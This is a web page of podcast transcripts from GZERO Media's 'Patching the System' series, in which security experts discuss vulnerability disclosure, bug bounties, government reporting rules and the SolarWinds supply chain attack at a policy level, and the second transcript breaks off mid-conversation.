Trending Now
We have updated our Privacy Policy and Terms of Use for Eurasia Group and its affiliates, including GZERO Media, to clarify the types of data we collect, how we collect it, how we use data and with whom we share data. By using our website you consent to our Terms and Conditions and Privacy Policy, including the transfer of your personal data to the United States from your country of residence, and our use of cookies described in our Cookie Policy.
{{ subpage.title }}
Podcast: Can governments protect us from dangerous software bugs?
Listen: We've probably all felt the slight annoyance at prompts we receive to update our devices. But these updates deliver vital patches to our software, protecting us from bad actors. Governments around the world are increasingly interested in monitoring when dangerous bugs are discovered as a means to protect citizens. But would such regulation have the intended effect?
In season 2, episode 5 of Patching the System, we focus on the international system of bringing peace and security online. In this episode, we look at how software vulnerabilities are discovered and reported, what government regulators can and can't do, and the strength of a coordinated disclosure process, among other solutions.
Our participants are:
- Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro
- Serge Droz from the Forum of Incident Response and Security Teams (FIRST)
- Ali Wyne, Eurasia Group Senior Analyst (moderator)
GZERO’s special podcast series “Patching the System,” produced in partnership with Microsoft as part of the award-winning Global Stage series, highlights the work of the Cybersecurity Tech Accord, a public commitment from over 150 global technology companies dedicated to creating a safer cyber world for all of us.
Subscribe to the GZERO World Podcast on Apple Podcasts, Spotify, Stitcher, or your preferred podcast platform, to receive new episodes as soon as they're published.
TRANSCRIPT: Can governments protect us from dangerous software bugs?
Disclosure: The opinions expressed by Eurasia Group analysts in this podcast episode are their own, and may differ from those of Microsoft and its affiliates.
DUSTIN CHILDS: The industry needs to do better than what they have been doing in the past, but it's never going to be a situation where they ship perfect code, at least not with our current way of developing software.
SERGE DROZ: I think the job of the government is to create an environment in which responsible vulnerability disclosure is actually possible and is also something that's desirable.
ALI WYNE: If you've ever gotten a notification pop up on your phone or computer saying that an update is urgently needed, you've probably felt that twinge of inconvenience at having to wait for a download or restart your device. But what you might not always think about is that these software updates can also deliver patches to your system, a process that is in fact where this podcast series gets its name.
Today, we'll talk about vulnerabilities that we all face in a world of increasing interconnectedness.
Welcome to Patching the System, a special podcast from the Global Stage Series, a partnership between GZERO Media and Microsoft. I'm Ali Wyne, a senior analyst at Eurasia Group. Throughout this series, we're highlighting the work of the Cybersecurity Tech Accord, a public commitment from more than 150 global technology companies dedicated to creating a safer cyber world for all of us.
And about those vulnerabilities that I mentioned before, we're talking specifically about the vulnerabilities in the wide range of IT products that we use, which can be entry points for malicious actors. And governments around the world are increasingly interested in knowing about these software vulnerabilities when they're discovered.
Since 2021 for example, China has required that anytime such software vulnerabilities are discovered, they first be reported to a government ministry even before the company that makes a technology is alerted to the issue. In the European Union, less stringent, but similar legislation is pending, that would require companies that discover that a software vulnerability has been exploited to report the information to government agencies within 24 hours and also provide information on any mitigation use to correct the issue.
These policy trends have raised concerns from technology companies and incident responders that such policies could actually undermine security.
Joining us today to delve into these trends and explain why are Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro, a cybersecurity firm base in Japan, and Serge Droz from the Forum of Incident Response and Security Teams, AKA First, a community of IT security teams that respond when there's a major cyber crisis. Dustin, Serge, welcome to you both.
DUSTIN CHILDS: Hello. Thanks for having me.
SERGE DROZ: Hi. Thanks for having me.
ALI WYNE: It's great to be talking with both of you today. Dustin, let me kick off the conversation with you. And I tried in my introductory remarks to give listeners a quick glimpse as to what it is that we're talking about here, but give us some more detail. What exactly do we mean by vulnerabilities in this context and where did they originate?
DUSTIN CHILDS: Well, vulnerability, really when you break it down, it's a flaw in software that could allow a threat actor to potentially compromise a target, and that's a fancy way of saying it's a bug. They originate in humans because humans are imperfect and they make imperfect code, so there's no software in the world that is completely bug free, at least none that we've been able to generate so far. So every product, every program given enough time and resources can be compromised because they all have bugs, they all have vulnerabilities in them. Now, vulnerability doesn't necessarily mean that it can be exploited, but a vulnerability is something within a piece of software that potentially can be exploited by a threat actor, a bad guy.
ALI WYNE: And Serge, when we're talking about the stakes here, obviously vulnerabilities can create cracks in the foundation that lead to cybersecurity incidents or attacks. What does it take for a software vulnerability to become weaponized?
SERGE DROZ: Well, that really depends on the particular vulnerability. A couple of years ago, there was a vulnerability that was really super easy to exploit: log4j. It was something that everybody could do in an afternoon, and that of course, is a really big risk. If something like that gets public before it's fixed, we really have a big problem. Other vulnerabilities are much harder to exploit also because software vendors, in particular operating system vendors have invested a great deal in making it hard to exploit vulnerabilities on their systems. The easy ones are getting rarer, mostly because operating system companies are building countermeasures that makes it hard to exploit these. Others are a lot harder and need specialists, and that's why they fetch such a high price. So there is no general answer, but the trend is it's getting harder, which is a good thing.
ALI WYNE: And Dustin, let me come back to you then. So who might discover these vulnerabilities first and what kinds of phenomena make them more likely to become a major security risk? And give us a sense of the timeline between when a vulnerability is discovered and when a so-called bad actor can actually start exploiting it in a serious way.
DUSTIN CHILDS: The people who are discovering these are across the board. They're everyone from lone researchers just looking at things to nation states, really reverse engineering programs for their own purposes. So a lot of different people are looking at bugs, and it could be you just stumble across it too and it's like, "Oh, hey. Look, it's a bug. I should report this."
So there's a lot of different people who are finding bugs. Not all of them are monetizing their research. Some people just report it. Some people will find a bug and want to get paid in one way or another, and that's what I do, is I help them with that.
But then once it gets reported, depending on what industry you're in, it's usually like 120 days to up to a year until it gets fixed from the vendor. But if a threat actor finds it, they can weaponize it and it can be weaponized, they can do that within 48 hours. So even if a patch is available and that patch is well-known, the bad guys can take that patch and reverse engineer it and turn it into an exploit within 48 hours and start spreading. So within 30 days of a patch being made available, widespread exploitation is not uncommon if a bug can be exploited.
ALI WYNE: Wow. So 48 hours, that doesn't give folks much time to respond, but thank you, Dustin, for giving us that number. I think we now have at least some sense of the problem, the scale of the problem, and we'll talk about prevention and solutions in a bit. But first, Serge, I want to come back to you. I want to go into some more detail about the reporting process. What are the best practices in terms of reporting these vulnerabilities that we've been discussing today? I mean, suppose if I were to discover a software vulnerability for example, what should I do?
SERGE DROZ: This is a really good question, and there's still a lot of ongoing debate, even though the principles are actually quite clear. If you find a vulnerability, your first step should be to actually start informing confidentially the vendor, whoever is responsible for the software product.
But that actually sounds easier than it is because quite often it's maybe hard to talk to a vendor. There's still some companies out there that don't talk to ‘hackers,’ in inverted commas. That's really bad practice. In this case, I recommend that you contact a national agency that you trust that can mediate in between you, and that's all fairly easy to do if it's just between you and another party, but then you have a lot of vulnerabilities in products for no one is really responsible, take open source or products that actually are used in all the other products.
So we talking about supply chain issues and then things really become messy. And in these cases, I really recommend that people start working together with someone who's experienced in doing coordinated vulnerability disclosure. Quite often what happens is that within the industry affected organizations get together, they form a working group that silently starts mitigating this spec practices, that you give the vendor three months or more to actually be able to fix a bug because sometimes it's not that easy. What you really should not be doing is leaking any kind of information, like even saying, "Hey, I have found the vulnerability in product X," it may actually trigger someone to start looking at this. So this is really important that this remains a confidential process where very few people are involved.
ALI WYNE: So one popular method of uncovering these vulnerabilities that we've been discussing, it involves, so-called bug bounty programs. What are bug bounty programs? Are they a good tool for catching and reporting these vulnerabilities, and then moving beyond bug bounty programs, are there other tools that work when it comes to reporting vulnerabilities?
SERGE DROZ: Bug bounty programs are just one of the tools we have in our tool chest to actually find vulnerabilities. The idea behind a bounty program is that you have a lot of researchers that actually poke at code just because they may be interested, and at the company or a producer of software, you offer them a bounty, some money. If they report a vulnerability responsibly, you pay them some money usually depending on how severe or how dangerous the vulnerability is and encourage good behavior this way. I think it's a really great way because it actually creates a lot of diversity. Typically, bug bounty programs attract a lot of different types of researchers. So we have different ways of looking at your code and that often discovers vulnerabilities that no one has ever thought of because no one really had that way of thought, so I think it's a really good thing.
It also awards people that responsibly disclose and don't just sell it to the highest bidder because we do have companies out there that buy vulnerabilities that then end up in some strange gray market, exactly what we don't want, so I think that's a really good thing. Bug bounty programs are complimentary to what we call penetration testing, where you hire a company that for money, starts looking at your software. There's no guarantee that they find a bug, but they usually have a systematic way of going over this and you have an agreement. As I said, I don't think there's a single silver bullet, a single way to make this, but I think this is a great way to actually also reward this. And some of the bug bounty researchers make a lot of money. They actually make a living of that. If you're really good, you can make a decent amount of money.
DUSTIN CHILDS: Yeah, and let me just add on to that as someone who runs a bug bounty program. There are a couple of different types of bug bounty programs too, and the most common one is the vendor specific one. So Microsoft buys Microsoft bugs, Apple buys Apple bugs, Google buys Google bugs. Then there's the ones that are like us. We're vendor-agnostic. We buy Microsoft and Apple and Google and Dell and everything else pretty much in between.
And one of the biggest things that we do as a vendor-agnostic program is an individual researcher might not have a lot of sway when they contact a big vendor like a Microsoft or a Google, but if they come through a program like ours or other vendor-agnostic programs out there, they know that they have the weight of the Zero Day Initiative or that program behind it, so when the vendor receives that report, they know it's already been vetted by a program and it's already been looked at. So it's a little bit like giving them a big brother that they can take to the schoolyard and say, "Show me where the software hurt you," and then we can help step in for that.
ALI WYNE: And Dustin, you've told us what bug bounty programs are. Why would someone want to participate in that program?
DUSTIN CHILDS: Well, researchers have a lot of different motivations, whether it's curiosity or just trying to get stuff fixed, but it turns out money is a very big motivator pretty much across the spectrum. We all have bills to pay, and a bug bounty program is a way to get something fixed and earn potentially a large amount of money depending on the type of bug that you have. The bugs I deal with range anywhere between $150 on the very low end, up to $15 million for the most severe zero click iPhone exploits being purchased by government type of thing, so there's all points in between too. So it's potentially lucrative if you find the right types of bugs, and we do have people who are exclusively bug hunters throughout the year and they make a pretty good living at it.
ALI WYNE: Duly noted. So maybe I'm playing a little bit of a devil's advocate here, but if vulnerabilities, these cyber vulnerabilities, if they usually arise from errors in code or other technology mistakes from companies, aren't they principally a matter of industry responsibility? And wouldn't the best prevention just be to regulate software development more tightly and avoid these mistakes from getting out into the world in the first place?
DUSTIN CHILDS: Oh, you used the R word. Regulation, that's a big word in this industry. So obviously it's less expensive to fix bugs in software before it ships than after it ships. So yes, obviously it's better to fix these bugs before they reach the public. However, that's not really realistic because like I said, every software has bugs and you could spend a lifetime testing and testing and testing and never root them all out and then never ship a product. So the industry right now is definitely looking to ship product. Can they do a better job? I certainly think they can. I spent a lot of money buying bugs and some of them I'm like, "Ooh, that's a silly bug that should never have left wherever shipped at." So absolutely, the industry needs to do better than what they have been doing in the past, but it's never going to be a situation where they ship perfect code, at least not with our current way of developing software.
ALI WYNE: Obviously there isn't any silver bullet when it comes to managing these vulnerabilities, disclosing these vulnerabilities. So assuming that we probably can't eliminate all of them, how should organizations deal with fixing these issues when they're discovered? And is there some kind of coordinated vulnerability disclosure process that organizations should follow?
DUSTIN CHILDS: There is a coordinated disclosure process. I mean, I've been in this industry for 25 years and dealing with vulnerability disclosures since 2008 personally, so this is a well-known process where you report to it. As an industry if you're developing software, one of the most important things you can do is make sure you have a contact. If someone finds a bug in your program, who do they email? The more established programs like Microsoft and Apple and Google, it's very clear if you find a bug there who you're supposed to email and what you're supposed to do with it. One of the problems we have as a bug bounty program is if we purchase a bug in a lesser known piece of software, sometimes it's hard for us to hunt down who actually is responsible for maintaining it and updating it.
We've even had to go on to Twitter and LinkedIn to try and hunt down some people to respond to an email to say, "Hey, we've got a bug in your program," so that's one of the biggest things you can do is just be aware that somebody could report a bug to you. And as a consumer of the product, however, you need a patch management program. So you can't just rely on automatic updates. You can't just rely on things happening automatically or easily. You need to understand first what is in your environment, so you have to be ruthless in your asset discovery, and I do use the word ruthless there intentionally. You've got to know what is in your enterprise to be able to defend it, and then you've got to have a plan for managing it and patching it. That's a lot easier said than done, especially in a modern enterprise where not only do you have desktops and laptops, you've got IT devices, you've got IOT devices, you've got thermostats, you've got update, you've got little screens everywhere that need updating and they all have to be included in that patch management process.
ALI WYNE: Serge, when it comes to triaging vulnerabilities, it doesn't sound like there's a large need for government participation. So what are some of the reasons legitimate and maybe less than legitimate why governments might increasingly want to be notified about vulnerabilities even before patches are available? What are their motivations?
SERGE DROZ: So I think there are several different motivations that governments are getting increasingly fed up with these kind of excuses that our industry, the software industry makes about how hard it is to avoid software vulnerabilities, all the reasons and excuses we bring and for not doing our jobs. And frankly, as Dustin said, we could be doing better. Governments just want to know so they can actually give out the message that, "Hey, we're watching you and we want to make sure you do your job." Personally, I'm not really convinced this is going to work. So that will be mostly the legitimate reasons why the governments want to know about vulnerabilities. I think it's fair that the government knows or learns about the vulnerability after the fact, just to get an idea of what the risk is for the entire industry. Personally, I feel it should only be the parties that need to know should know it during the responsible disclosure.
And then of course, there's governments that like vulnerabilities because they can abuse it themselves. I mean, governments are known to exploit vulnerabilities through their favorite three letter agencies. That's actually quite legitimate for governments to do. It's not illegal for governments to do this type of work, but of course, as a consumer or as an end user, I don't like this, I don't want products that have vulnerabilities that are exploited. And personally from a civil society point of view, there's just too much risk with this being out there. So my advice really is the fewer people, the few organizations know about a vulnerability the better.
DUSTIN CHILDS: What we've been talking about a lot so far is what we call coordinated disclosure, where the researcher and the vendor coordinate a response. When you start talking about governments though, you start talking about non-disclosure, and that's when people hold onto these bugs and don't report them to the vendor at all, and the reason they do that is so that they can use them exclusively. So that is one reason why governments hold onto these bugs and want to be notified is so that they have a chance to use them against their adversaries or against their own population before anyone else can use them or even before it gets fixed.
ALI WYNE: So the Cybersecurity Tech Accord had recently released a statement opposing the kinds of reporting requirements we've been discussing. From an industry perspective, what are the concerns when it comes to reporting on vulnerabilities to governments?
DUSTIN CHILDS: Really the biggest concern is making sure that we all have an equitable chance to get it fixed before it gets used. If a single government starts using vulnerabilities to exploit for their own personal gain, for whatever, that puts the rest of the world at a disadvantage, and that's the rest of the world, their allies as well as their opponents. So we want to do coordinated disclosure. We want to get the bugs fixed in a timely manner, and keeping them to themselves really discourages that. It discourages finding bugs, it discourages reporting bugs. It really discourages from vendors from fixing bugs too, because if the vendors know that the governments are just going to be using these bugs, they might get a phone call from their friendly neighborhood three letter and say, "You know what? Hold off on fixing that for a while." Again, it just puts us all at risk, and we saw this with Stuxnet.
Stuxnet was a tool that was developed by governments targeting another government. It was targeting Iranian nuclear facilities, and it did do damage to Iranian nuclear facilities, but it also did a lot of collateral damage throughout Europe as well, and that's what we're trying to avoid. It's like if it's a government on government thing, great, that's what governments do, but we're trying to minimize the collateral damage from everyone else who was hurt by this, and there really were a lot of other places that were impacted negatively from the Stuxnet virus.
ALI WYNE: And Serge, what would you say to someone who might respond to the concerns that Dustin has raised by saying, "Well, my government is advanced and capable enough to handle information about vulnerabilities responsibly and securely, so there's no issue or added risk in reporting to them." What would you say to that individual?
SERGE DROZ: The point is that there are certain things that really you only deal on a need to know basis. That's something that governments actually do know. Governments when they deal with confidential or critical information, it's always on the need to know. They don't tell this to every government employee even though they're, of course, are loyal. It makes the risk of this leaking even if the government doesn't have any ill intent bigger, so there's just no need the same way there is no need that all the other a hundred thousand security researchers need to know about this. So I think as long as you cannot contribute constructively to mitigating this vulnerability, you should not be part of that process.
Having said that, though, there is some governments that actually have really tried hard to help researchers making contact with vendors. Some researchers are afraid to report vulnerabilities because they feel they're going to become under pressure or stuff like this. So if a government wants to take that role and can or can't create enough trust that researchers trust them, I don't really have a problem, but it should not be mandatory. Trust needs to be earned. You cannot legislate this, and every time you have to legislate something, I mean, come on, you legislate it because people don't trust you.
ALI WYNE: We spent some time talking about vulnerabilities, why they're a problem. We've discussed some effective and maybe some not so effective ways to prevent or manage them better. And I think the governments have a legitimate interest in knowing the companies are acting responsibly and that, that interest is the impetus behind some of the push, at least for more regulation and reporting. But what do each of you see sees other ways that governments could help ensure that companies are mitigating risks and protecting consumers as much as possible?
DUSTIN CHILDS: So one of the things that we're involved with here at the Zero Day Initiative is encouraging governments to allow safe harbor. And really what that means is researchers are safe in reporting vulnerabilities to a vendor without the legal threat of being sued or having other action taken against them so that as long as they are legitimately reporting a bug and not trying to steal or violate laws, as long as they're legitimate researchers trying to get something fixed, they're able to do that without facing legal consequences.
One of the biggest things that we do as a bug bounty program is just handle the communications between researchers and the vendors, and that is really where it can get very contentious. So to me, one of the things that governments can do to help is make sure that safe harbor is allowed so that the researchers know that, "I can report this vulnerability to this vendor without getting in touch with a lawyer first. I'm just here trying to get something fixed. Maybe I'm trying to get paid as well," so maybe there is some monetary value in it, but really they're just trying to get something fixed, and they're not trying to extort anyone. They're not trying to create havoc, they're just trying to get a bug fixed, and that safe harbor would be very valuable for them. That's one thing we're working on with our government contacts, and I think it's a very big thing for the industry to assume as well.
SERGE DROZ: Yes, I concur with Dustin. I think the job of the government is to create an environment in which responsible vulnerability disclosure is actually possible and is also something that's desirable, that also includes a regulatory framework that actually gets away from this blaming. I mean, writing software is hard, bugs appear. If you just constantly keep bashing people that they're not doing it right or you threaten them with liabilities, they're not going to talk to you about these types of things. So I think the job of the government is to encourage responsible behavior and to create an environment in that, and maybe there's always going to be a couple of black sheeps, and here maybe the role of the government is really to encourage them to play along and start offering vulnerability reporting programs. That's where I see the role of the government, creating good governance to actually enable responsible vulnerabilities disclosure.
ALI WYNE: Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro, a cybersecurity firm base in Japan. And Serge Droz from the Forum of Incident Response and Security Teams, a community of IT security teams that respond when there is a major cyber crisis. Dustin, Serge, thanks very much for joining me today.
DUSTIN CHILDS: You're very welcome. Thank you for having me.
SERGE DROZ: Yes, same here. It was a pleasure.
ALI WYNE: That's it for this episode of Patching the System. We have five episodes this season covering everything from cyber mercenaries to a cybercrime treaty. So follow Ian Bremmer's GZERO World feed anywhere you get your podcast to hear more. I'm Ali Wyne. Thanks very much for listening.
Subscribe to the GZERO World Podcast on Apple Podcasts, Spotify, Stitcher, or your preferred podcast platform, to receive new episodes as soon as they're published.
Attacked by ransomware: The hospital network brought to a standstill by cybercriminals
In October 2022, the second-largest nonprofit healthcare system in the US, CommonSpirit Health, was hit with a crippling ransomware attack. Kelsay Irby works as an ER nurse at a CommonSpirit hospital in Washington. She arrived at work after the malware had spread through the hospital network to chaos: systems were down, computers were running slowly or not at all, labs weren’t returning results, and nurses were charting vitals on pen and paper. Even basic things like knowing what medications patients were on or why they came into the emergency room were a challenge, putting lives at risk. The hospital’s nurses and doctors scrambled to manage this crisis for over two weeks until CommonSpirit Health was able to restore access to the IT network
“It was just kind of this perfect storm of very sick patients, not enough help, everybody was super frustrated,” Irby says, “My biggest fear during the whole cyberattack was that a patient was going to suffer because we couldn’t access the technology.”
GZERO spoke with Irby about her experience during the ransomware attack, as well as cybersecurity expert Mora Durante Astrada from Zurich Insurance Group for the final episode of “Caught in the Digital Crosshairs: The Human Impact of Cyberattacks,” a new video series on cybersecurity produced by GZERO in partnership with Microsoft and the CyberPeace Institute. Astrada volunteers for the Institute and its CyberPeace Builders Program, which provides free cybersecurity assistance, threat detection, and analysis to NGOs and other critical sectors while advocating for safety and security in cyberspace.
- Podcast: Cyber Mercenaries and the digital “wild west" ›
- The threat of CEO fraud and one NGO's resilient response ›
- Hacked by Pegasus spyware: The human rights lawyer trying to free a princess ›
- Podcast: How cyber diplomacy is protecting the world from online threats - GZERO Media ›
- Podcast: Foreign Influence, Cyberspace, and Geopolitics - GZERO Media ›
- Podcast: Cyber mercenaries and the global surveillance-for-hire market - GZERO Media ›
- The devastating impact of cyberattacks and how to protect against them - GZERO Media ›
- How cyberattacks hurt people in war zones - GZERO Media ›
- How rogue states use cyberattacks to undermine stability - GZERO Media ›
- Why privacy is priceless - GZERO Media ›
- Would the proposed UN Cybercrime Treaty hurt more than it helps? - GZERO Media ›
- Why snooping in your private life is big business - GZERO Media ›
Podcast: Lessons of the SolarWinds attack
Listen: Two years after the discovery of one of the largest cyber attacks in history, we’re looking at the current state of security for both software and hardware supply chains.
In early 2020, a group of hackers broke into a software system built and managed by the Texas-based company SolarWinds. The malware they installed was eventually downloaded by thousands of SolarWinds customers, including both private companies and government agencies like the US State Department. SolarWinds has since said the number of clients actually hacked was far lower.
What lessons were learned, and how vulnerable are information and communication technology supply chains today?
In the third episode of Patching the System, a GZERO podcast produced as part of the Global Stage partnership with Microsoft, we’re examining that question with two top experts in the field.
Our participants are:
- Gaus Rajnovic, cybersecurity manager at Panasonic Europe
- Charles Carmakal, senior vice president and chief technology officer at Mandiant
- Ali Wyne, Eurasia Group Senior Analyst (moderator)
Subscribe to the GZERO World Podcast on Apple Podcasts, Spotify, Stitcher, or your preferred podcast platform, to receive new episodes as soon as they're published.
Podcast: Lessons of the SolarWinds attack
Disclosure: The opinions expressed by Eurasia Group analysts in this podcast episode are their own, and may differ from those of Microsoft and its affiliates.
Gaus Rajnovic: Scope and coverage, that is why those supply chain attacks are so dangerous. They spread easily and relatively quickly.
Charles Carmakal: As an average person though, it is impossible for us to really consider all the variety of cybersecurity attacks that are out there. And in general, the right practice is to have some level of trust of the vendors of the software that you use.
Ali Wyne: Welcome to Patching The System, a special podcast for the Global Stage series, a partnership between GZERO Media and Microsoft. I'm Ali Wyne, a senior analyst at Eurasia Group. Throughout this series, we're highlighting the work of the Cybersecurity Tech Accord, a public commitment from more than 150 global technology companies dedicated to creating a safer cyber world for all of us.
Today we're talking about a cyber attack so massive it became a household name, SolarWinds. In early 2020, a group of hackers broke into a software system called Orion, which was built and managed by the Texas-based company SolarWinds. They installed malicious code and later that spring, it was unwittingly delivered to customers in routine software updates. In total, more than 18,000 clients were affected, including large private companies as well as some government agencies, including the state department and the Department of Homeland Security.
Now the SolarWinds hack is an example of what we call a supply chain attack on information and communication technology, or ICT for short. We're going to talk about what those kinds of attacks are and why they pose a serious and unique threat in the world of cyber attacks.
Joining us now are two industry representatives who work on different sides of this issue. First
Charles Carmakal, who is a senior vice president and chief technology officer at Mandiant, a security research firm working to discover and thwart bad actors who target technology products and services. Charles, it's great to have you here.
Charles Carmakal: Thanks a lot. It's great to be here.
Ali Wyne: We're also joined by Gaus Rajnovic. He serves as a cybersecurity manager at Panasonic Europe, which makes a wide range of technology products, many of which listeners may be familiar with. Gaus, welcome.
Gaus Rajnovic: Hello.
Ali Wyne: Let's dive in first just by providing some additional context around the hacking attack that I mentioned, SolarWinds. Charles you are from Mandiant, which obviously has a relationship to this attack so why don't you explain to us from your perspective first, how bad was this attack? Second, how was it discovered? And third, what was the fallout?
Charles Carmakal: Yeah, absolutely. So I was very close to the event. It really changed my world and I remember it very vividly. So back in December, 2020, I worked for FireEye and that was the organization that ended up detecting and discovering the SolarWinds attack. An employee had registered a second mobile device into our multifactor authentication solution and one of our security analysts had picked that up and noticed that the second enrollment of the secondary device seemed a little bit suspicious. And so he actually reached out to the employee to figure out whether or not he had actually enrolled a second mobile device and he said he didn't.
And that actually kicked off what ended up being probably one of the most notable cybersecurity events in history. And so as the days progressed and as we conducted an investigation to really try to understand how did somebody get access to the credentials of this employee to be able to enroll a second mobile device into our multifactor authentication solution, we started finding evidence of attacker activity.
As part of any investigation, you've got to figure out how did the attackers actually get access to the environment. And as we were digging and digging and digging, the earliest evidence of attacker activity that we saw occurred on SolarWinds' Orion systems that we use at FireEye, but we couldn't tell exactly how did the threat actor get access to those systems. And there were a number of hypotheses that we tested and one of those tests was whether or not there was a potential supply chain attack, essentially meaning was it possible that malicious code was actually sent to our computers through SolarWinds, through a legitimate code process? And what we ended up doing to figure out if this actually was the case, was we reverse engineered these SolarWinds' Orion software. We essentially reverse engineered, tens of thousands of lines of code.
And ultimately, we identified a few thousand lines of code that were heavily obfuscated and looked very suspicious, if not malicious in nature. And the thing that we noticed about it was it was digitally signed by the vendor. So we knew that the code, although it looked suspicious, arguably malicious, we knew that it came from SolarWinds because it was digitally signed unless the digital signatures were stolen or the keys were stolen from SolarWinds. And so as part of the process, we called SolarWinds and we let them know what our findings were. And we got back on the phone with them a few hours later and what they had confirmed to us was that they didn't see any malicious code in the code repositories for the SolarWinds' Orion product.
But what they told us is after the product was built, they see these unauthorized routines that are added to the finished product. And at that point in time, we knew that there was a supply chain attack, and we knew that the legitimate software that was downloaded by thousands of organizations ended up having a malicious component, what we call SUNBURST, which would've allowed a Russian adversary to get access to computer systems that were running the software.
The important thing to note is, this was arguably one of the most expensive cyber weapons that had been developed by a government. And because it was so expensive, the threat actor behind it was very specific in choosing which organizations they were going to leverage this backdoor and this capability to conduct further intrusion activity on. And we suspect that there were less than a hundred organizations that they chose to leverage this capability with.
But those a hundred, some odd organizations are arguably some of the most high profile, hardest to hack organizations out there from both a commercial and a government perspective. The impact was pretty significant in the sense that this enabled the Russian government to get access to data that was of strategic interest to the Russian government. They were very interested in data that governments had, and they were interested in commercial entities that either had access to that same data, or that could facilitate access to the systems or the network of government entities to get that information that was of strategic interest to the Russian government.
Ali Wyne: Wow. I mean, almost felt like I was listening to a new Netflix drama on the SolarWinds attack. Now granted this particular hack took place in 2020, but the narrative that you just related to us, it obviously couldn't be more timely in light of Russia's invasion of Ukraine. Gaus, I want to come to you. Can you give us a basic understanding of what we mean by the phrase supply chain attacks? I mean, why are they dangerous?
Gaus Rajnovic: Absolutely. Let me just say, I am working for a vendor. Part of my answers is basically describing how those attacks influence us vendors, so people who are producing something, but at the same time, how it also affects users of technology.
So coming to your question, scope and coverage, that is what makes them dangerous. They spread easily and relatively quickly. I was also always puzzled why we haven't seen them a little bit earlier because from my vendor side, you were able to see that potential some time ago.
Gaus Rajnovic: And why I'm saying that, let me give example how products are being made. So when you want to create a new product, you would take ready-made components, you just put everything on one pile and then you add a little bit of magic, something that is unique for your product, so that you can be different from the others. But basically, apart from really relatively small number of vendors, most of the vendors are using already made components. So there is a high spread reuse and that is why it spread through our industry and that is why those supply chain attacks are so dangerous.
Ali Wyne: Charles, I want to come back to you in light of the explanation that Gaus just provided and talking about not only sort of software but hardware. When we hear the phrase supply chains, we often think about physical components. So imagine, for example, car parts that are made in one country that are put in cars in another country, but in the case of SolarWinds, we're talking about the targeting of software, not hardware. It's less about a bunch of items that are stored in a warehouse somewhere. Can you explain a little bit more about what is in a software supply chain? And maybe in addition to explaining what is in a software supply chain, help us understand the various points along that chain that potentially could be targeted?
Charles Carmakal: Yeah, yeah. So look, I think there is a general confusion as to what a supply chain attack is and if you asked somebody what a supply chain attack is back in the summer of 2020, they'd give you a very different definition than what they would've told you in January of 2021. And many of our definitions changed in December, 2020 when we heard about the SolarWinds attack.
Ali Wyne: Sure.
Charles Carmakal: And that's kind of because of the ubiquity of SolarWinds and because of how prevalent the attack was. So what happened with SolarWinds is a threat actor found a way to insert malicious code into a legitimate product that ended up getting shipped out to a variety of customers across the globe.
And that software was authenticated by SolarWinds and it was part of a legitimate software update process that SolarWinds had established to allow people to get updated version of their software. And when they say 18,000 some odd organizations could have potentially been impacted by SUNBURST or by this attack, that's really the estimated count of the number of organizations that had legitimately downloaded the software update.
Another way to look at a supply chain attack is, can a threat actor break into one company, perhaps a service provider, and leverage that access to that one service provider and get access to dozens or hundreds or thousands of other organizations because of the legitimate connectivity between that service provider and their thousands, some odd customers?
And we see attacks like this all the time.
Ali Wyne: Gaus, Panasonic is a company that obviously makes a lot of consumer devices. So are there similar cyber vulnerabilities in the hardware supply chain? How can hardware supply chains be targeted?
Gaus Rajnovic: Oh, well, yes. I mean, nowadays, and especially in IT hardware, it is just software in disguise because usually, I mean, if possible, you would like to have a chip that you can use for multiple purposes. So basically you will have a hardware that then you program and then you change the function as needed. So yeah, absolutely. But not if we move a little bit away from that and look generally how hardware and chips in particular, about vulnerabilities in them, it is a longstanding concern and especially for, well, Western governments, because what is happening is that obviously they need to procure products for their environment whenever they're using it. And sometimes that environment tend to rely on relatively old chips, which are not being produced by, let's say, Western vendors anymore. So they need to procure it from elsewhere. Now you have a question, do we really trust that those chips would not contain any undocumented and unwanted functionalities?
So you do have the whole science of testing and verifying that what you are getting is actually what you want to do and that there is nothing else in it. And it is hard.
Ali Wyne: So Charles, let me come back to you. So software supply chains are being targeted, hardware supply chains are being targeted. Well, obviously as listeners, I think all of us, regardless of what our position is or what kinds of devices we have, we all want to take steps to enhance the security of our devices, but I've got to be candid with you. When I think about how many times, just in a given day, how many times my phone asks me to install certain updates, my laptop asks me to install certain updates, my instinct is to install them because I want to enhance the security of my devices, but it's pretty overwhelming to think about whether or not we can actually trust all of these updates that we were being asked to install. Isn't it?
Charles Carmakal: It absolutely is. And a funny argument that was being made during the SolarWinds supply chain days was that the organizations that weren't impacted were the ones that were really late to apply the patch. And so some of them joke that they just had such bad patch management processes that they didn't have to deal with the cybersecurity implications of the attack.
Ali Wyne: Yeah.
Charles Carmakal: As an average person though, it is impossible for us to really consider all the variety of cybersecurity attacks that are out there. And in general, the right practice is to have some level of trust of the vendors of the software that you use, assuming that you're using legitimate commercial software or open source software, and it's to apply the patches that are made available because the vast majority of the time, the patches will actually increase the overall security posture of your system, of your device, of whatever it is that you're installing the patch on.
It's the edge cases where attackers get access to software supply chains and are able to modify legitimate code and insert malicious code there. It happens. I could list off a few dozen examples where it's happened in the past, but for all the times that it's happened in the past, I mean, that's representative of less than 0.001% of all the software updates and the patching that goes on out there. So I think in general, as an average, everyday person, patching is good, patching provides additional security capability and benefits. And when there are situations where patches are actually malicious, usually the community figures that out and they share that information broadly and people take corrective action.
Ali Wyne: No, that's helpful. That's helpful to know. Gaus, I want to come back to you and I want to make a little bit of an analogy between some of the supply chain vulnerabilities that we've been discussing and some of the vulnerabilities that we've seen in the time of COVID and I want to ask you if you can reflect a little bit on that comparison. So specifically, we know that supply chain issues earlier on in the product life cycle, say in raw materials, for example, that they can have a much greater impact later on when products get closer to consumers.
And we saw something kind of similar to this in global supply chain issues we faced, and that we continue to face during the coronavirus pandemic. So for example, if the raw materials were delayed a week due to labor shortages, that might mean that the next step of production was delayed two weeks or the next step four weeks, and so on. Do you think that it's valid to apply kind of a similar model to ICT supply chain attacks? And that is to say, the earlier in the process we see a vulnerability, the worse and broader the negative result and impact might be later on?
